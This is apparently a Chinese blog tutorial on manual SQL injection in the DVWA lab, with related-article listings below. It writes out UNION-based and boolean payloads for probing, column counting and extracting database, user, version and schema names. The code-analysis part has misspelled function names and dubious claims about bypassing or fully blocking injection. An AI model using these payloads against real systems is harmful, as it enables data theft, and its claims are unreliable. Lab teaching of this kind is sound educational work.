mysql注入dvwa_DVWA上SQL注入测试入门

最新推荐文章于 2024-03-10 08:57:42 发布
最新推荐文章于 2024-03-10 08:57:42 发布
阅读量211 收藏 1
点赞数 1
文章标签: mysql注入dvwa
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39517199/article/details/113635189
版权

目的

通过使用DVWA实例理解PHP中SQL注入漏洞产生的原理及利用方法,结合实例掌握其过滤方式。

原理

SQL注入:在用户的输入没有被转义字符过滤时。就会发生这种形式的注入式攻击,它会传递给数据库一个SQL语句。这样就会导致应用程序的终端用户对数据库上的语句实施操纵。就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。

具体来说,它是利用现有的应用出现,将(恶意)的SQL目录注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。

步骤

1. 低安全等级文件包含

1.1 登陆DVWA

使用浏览器打开``,输入用户名密码登陆。

1.2 调整安全级别

登陆后将DVWA的安全级别调整为low(见红框内)。调整之后选择SQL Injection,进入页面。

1.3 简单的ID查询

提示输入User ID,输入正确的ID,将显示IDFirst name,Surname信息。

1.4 检测是否存在注入

可以得知此处位注入点,尝试输入

'

,返回错误。

1.5 遍历数据库表

尝试遍历数据库表,提示输入的值是ID,可以初步判断此处为数字类型的注入。尝试输入

1 or 1=1

遍历数据库表。

可见并没有达成目的,猜测程序将此处看成了字符型,尝试输入

1' or' 1' =' 1

后遍历出了数据库中所有内容。

下面尝试不同语句,得到不同的结果。

1.6 查询信息列表长度

利用

order by [num]

语句来测试查询信息列表长度,修改num的值,这里我们输入

1' order by 1 --

结果页面正常显示,注意 -- 后面有空格。继续测试,

1' order by 2 --,1' order by 3 --

,当输入3时,页面报错。页面错误信息如下:

Unknown column '3' in 'order clause'

,由此我们判断查询结果值为2列。

1.7 获取数据库名称、账户名、版本及操作系统信息

通过使用user(),database(),version()三个内置函数得到连接数据库的账户名、数据库名称、数据库版本信息。首先参数注入

1' and 1=2 union select 1,2 --

(注意--后有空格)。

由上图得知,First name处显示结果位查询结果的第一列的值,surname处显示结果位查询结果第二列的值。通过注入

1' and 1=2 union select user(),database() --

得到数据库用户为root@localhost及数据库名dvwa

通过注入

1' and 1=2 union select version(),database() --

得到数据库版本信息,此处数据库版本为5.0.90-community-nt。

通过注入

1' and 1=2 union select 1,@@global.version_compile_os from mysql.user --

获得操作系统信息。

1.8 查询mysql数据库所有数据库及表

通过注入

1' and 1=2 union select 1,schema_name from information_schema.schemata --

查询mysql数据库的所有数据库名。

这里利用mysql默认的数据库 information_schema,该数据库存储了Mysql所以数据库和表的信息。如图所示

1.9 猜解表名

通过注入

1' and exists(select * from users) --

猜解dvwa数据库中的表名。

利用

1' and exists(select * from [表名])

,这里测试的结果,表名为users,在真实的渗透环境中,攻击者往往关心存储管理员用户和密码信息的表。

1.10 猜解字段名

猜解字段名:

1' and exists(select [表名] from users) --

。这里测试的字段名有first_name, last_name。

通过注入

1' and exists(select first_name from users) --

1' and exists(select last_name from users) --

猜解字段名。

1.11 爆出数据库中字段内容

注入

1' and 1=2 union select first_name,last_name from users --

,这里其实如果是存放管理员账户的表,那么用户名,密码信息字段就可以爆出来了。

2. 代码分析

2.1 low等级源代码

如图所示

通过代码可以看出,对输入$id 的值没有进行任何过滤就直接放入了SQL语句中进行处理,这样带来了极大的隐患。

2.2 中等等级代码分析

将 DVWA 安全级别调整位 medium,查看源代码。

通过源代码可以看出,在中等级别时对输入的$id值使用 mysql_real_eascape_string() 函数进行了处理。在PHP中,使用 mysql_real_eascape_string() 函数用来转移SQL语句中使用字符串的特殊字符。但是使用这个函数对参数进行转换是存在绕过的。只需要将攻击字转换一下编码格式即可绕过该防护函数。比如URL编码等方式。

同时发现SQL语句中变成了

“WHRER user_id = “$id”

,此处变成了数字型注入,所以此处使用 mysql_real_eascape_string() 函数并没有起到防护作用。可以通过类似于

1 or 1=1

的语句来进行注入。

2.3 高等级代码分析

将DVWA安全级别调整为high,查看源代码。

从源代码可以看出,此处为字符型注入。对传入 $id的值使用 stripslashes() 函数处理以后,再经过到$mysql_real_escape_string() 函数进行第二次过滤。在默认情况下,PHP会对所有的GET,POST和cookie数据自动运行 addslashes(), addslashes() 函数返回在部分与定义之前添加\。

Striptslashes() 函数则是删除由 addslashes()函数添加的反斜杠。在使用两个函数进行过滤之后再使用 is_numric() 函数检查$id值是否位数字,彻底断绝了注入的存在。此种防护不存在绕过的可能。

weixin_39517199
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2019-2-26 dvwa学习(3)--sql注入级别high和session
weixin_42555985的博客
02-26 3279
2019-2-26 dvwa学习(3)–sql注入级别high 继续把dvwa环境安全级别调整为high 观察界面 high级别页面,点击"here to change your ID",会打开另外一个网页(session-input.php),然后输入3,提交,在主页面上会显示数据。 我们打开session-input.php的开发者工具,获取cookie 现在尝试按照前面的方式攻击,pos...
SQL注入各种注入原理|绕过技巧|带实例详解|
BING
03-19 7788
Union(联合)注入攻击详解、 字符型union注入、Boolean(布尔盲注)注入攻击详解、报错注入攻击详解(报错注入只显示一条结果,通常要使用limit)、时间注入攻击、堆叠查询注入攻击、二次注入攻击、宽字节注入攻击、cookie注入攻击、base64注入攻击、XFF注入攻击、SQL注入绕过技术、sql注入修复建议
网络安全必学SQL注入
kali_Ma的博客
11-04 7355
如果使用参数化查询,则在SQL语句中使用占位符表示需在运行时确定的参数值。当找到某个变量关键词有 SQL 注入风险时,可以再根据调用链找到该存在注入风险的业务逻辑代码,查看参数来源是否安全、是否有配置SQL危险参数过滤的过滤器,最终确认是否存在SQL注入。修改SQL语句之后,程序停止报错,但是却引入了SQL语句拼接的问题,如果没有对用户输入的内容做过滤,势必会产生SQL注入漏洞。至此,整个功能流程结束,在我们跟进的过程中,代码中无任何过滤语句,获取参数值,调用update方法更新,更新成功后返回结果。
SQL注入式攻击
gaofangxw的博客
06-13 1796
加密用户输入的数据,然后再将它与数据库中保存的数据比较,这相当于对用户输入的数据进行了"消毒"处理,用户输入的数据不再对数据库有任何特殊的意义,从而也就防止了攻击者注入SQL命令。(4)用户输入的内容提交给服务器之后,服务器运行上面的ASP.NET代码构造出查询用户的SQL命令,但由于攻击者输入的内容非常特殊,所以最后得到的SQL命令变成:SELECT * from Users WHERE login = '' or '1'='1' AND password = '' or '1'='1'。
2020-10-10
不二的博客
10-10 963
一:什么是sql注入   SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至篡改数据库。 二:SQL注入攻击的总体思路    1:寻找到SQL注入的位置   2:判断服务器类型和后台数据库类型   3:针对不同的服务器和数据库特点进行SQL注入攻击 三:SQL注入攻击实例 String sql = "select * from user_table where username= ' "+us..
网络安全威胁——SQL注入攻击
聚集机器学习、信息安全
04-04 9147
随着互联网的发展和普及,网络安全问题越来越突出。SQL注入(SQL Injection)攻击是其中最普遍的安全隐患之一,它利用应用程序对用户输入数据的任,将恶意SQL代码注入到应用程序中,导致敏感息泄露、数据损坏或删除及系统瘫痪,给企业和个人带来巨大损失。
DVWA_Tool.rar
02-13
Web应用程序(DVWA)是一个很容易受到攻击的PHP / MySQL Web应用程序。其主要目标是帮助安全专业人员在法律环境中测试他们的技能和工具,帮助Web开发人员更好地了解保护Web应用程序的过程,并帮助学生和教师了解受控...
网络渗透测试平台_DVWA_201807
07-04
DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。
dvwa测试环境,哈哈哈哈哈哈哈
05-29
DVWA(Damn Vulnerable Web Application)是一个开源的Web应用程序...通过深入挖掘DVWA的每一个模块,你不仅可以掌握SQL注入和渗透测试等核心概念,还能了解到Web安全的广泛领域,从而更好地保护自己和他人的在线资产。
Dvwa最新版本2022可用,下载到phpstudy,www目录下就可使用
06-28
DVWA现在已包含在流行的渗透测试Linux发行版中,例如Samurai的Web测试框架等。 【许可】DVWA是一个免费软件,在遵守自由软件基金会发布的GNU通用公共许可的前提下,你可以重新发布它和/或修改它。许可可以是版本3,...
学习之sql注入漏洞网址的创建
06-06
它包含多个安全漏洞,包括SQL注入,便于用户练习和测试防护策略。我们可以使用dvwa来快速构建一个模拟实战的环境。 创建SQL注入网址的环境搭建步骤大致如下: 1. 安装wamp:下载并安装wamp服务器,配置好环境后,...
DVWA之SQL Injection
谢公子的博客
08-05 7129
SQL Injection SQL Injection,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。近期很火的大使馆接连被黑事件,据说黑客依靠的就是常见的SQL注入漏洞。 手工注入思路 自动化的注入神器sqlmap...
SQL注入攻击实例-DVWA靶场
weixin_62715196的博客
01-10 1651
通过DVWA来对学习的SQL注入技术进行学习,分别通过对普通注入(联合注入)的低、中、高以及对盲注(布尔型盲注、时间型盲注)来进行实操,锻炼自己SQL注入的能力
一文带你学习SQL注入
大河之犬的博客
12-21 5581
但需要注意的是,存储过程中也可能会存在注入问题,因此应该尽量避免在存储过程内使用动态的SQL语句。如果无法避免,则应该使用严格的输入过滤或者是编码函数来处理用户的输入数据。下面是一个在Java中调用存储过程的例子,其中。
【web应用安全攻防技术】02 SQL注入 & XSS注入
m0_57432233的博客
01-31 1826
SQL注入攻击是利用Web应用程序数据层存在的输入验证不完善型安全漏洞实施的一类代码注入攻击技术跨站脚本是一种通常存在于Web应用程序中的安全漏洞,使得攻击者可以将恶意的代码注入到网页中,从而危害其他Web访问者(敏感息、客户端渗透攻击等)客户端脚本:Javascript,Flash ActionScript等。
SQL注入漏洞原理及注入示例
最新发布
m0_62480631的博客
03-10 1946
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询等操作。用户可以修改参数或数据,传递给服务端,导致服务端拼接了伪造的SQL查询语句,并将伪造的SQL语句发送给数据库服务端执行,数据库SQL语句的执行结果,返回给服务端,服务端又将结果返回给客户端,从而获取到敏感息,甚至危险的代码或系统指令。
Springboot+JdbcTemplate模拟SQL注入攻击案例及解决方法
老徐的博客只有干货
03-15 3082
SQL注入是软件开发项目测试过程中必测项,重要等级极高。本文以springboot项目为例,模拟含有SQL注入攻击,并提供解决方法。部分内容整理自网络。
sql注入攻击实例_【SEA分享】Web渗透——SQL注入攻击原理及实例
weixin_39664995的博客
12-09 2978
点进来的你和我一样看不懂标题。没关系,不妨先了解一下,为什么我在网址栏里输入一串网址,就可以访问到这个网页。了解通原理之后能帮助你更好的理解后面实例中的一顿“操作”。web通原理介绍IP:ip 实际上就是生活中的地址,好像 XX省XX市XX区...... ,只不过 ip 是由数字组成。IP 分为内网ip 和 公网ip,公网地址是运营商分配,内网地址是路由器分配的。域名:方便记...
SQL注入网站实例:注入步骤
老司机的后备箱
07-25 851
在第三部分,我们主要是详细的给大家演示,如何对一个网站进行SQL注入入侵的,这个入侵过程中,它是如何发现注入点的,发现和测试注入点之后,我们要如何来获得爆库、爆表、爆密码,甚至控制后台,一旦获得网站控制后台之后,更有甚者,要如何与数据库层、系统层进行交互提权,以便进一步控制数据库和操作系统,所有这些又是如何发生的我们将通过详细的注入实例,我们从中吸取教训,从安全角度来说,我们要如何来预防mysql注入的高级黑客,这就是我们第三部分所要解决的问题。
dvwa渗透测试平台
09-13
DVWA渗透测试平台是指Damn Vulnerable Web Application(简称DVWA)所搭建的用于渗透测试的平台。DVWA是一个存在着安全漏洞的Web应用程序,旨在帮助开发人员理解Web应用程序保护的过程。它被广泛应用于渗透测试、安全培训和安全研究等领域。 在安装DVWA渗透测试平台时,可以选择在Windows系统上使用Phpstudy进行安装。Phpstudy是一个集成的开发平台,包括了PHP和MySQL等开发软件,并且也可以作为一个网站运行。它提供了方便的图形化界面和简化的安装过程,适合用来搭建DVWA渗透测试平台。 具体的安装步骤如下: 1. 首先,下载并安装Phpstudy。Phpstudy提供了Windows版本的安装包,可以在官方网站上下载到。 2. 下载DVWA渗透测试平台的源码,可以从官方网站上获取到最新的版本。 3. 将下载得到DVWA源码解压到Phpstudy的web根目录下,一般默认路径为C:\phpstudy\WWW。 4. 打开Phpstudy管理界面,启动Apache和MySQL服务。 5. 打开浏览器,访问http://localhost/DVWA/install/,进入DVWA的安装界面。 6. 按照安装界面的提示,设置DVWA数据库连接息,并进行安装。 7. 安装完成后,访问http://localhost/DVWA/,即可进入DVWA渗透测试平台的主页。 通过以上步骤,就可以在Windows系统上使用Phpstudy安装并搭建DVWA渗透测试平台。安装完成后,您可以使用DVWA平台进行各种渗透测试实验,了解和学习Web应用程序的安全保护措施。 希望以上息对您有所帮助!如果还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值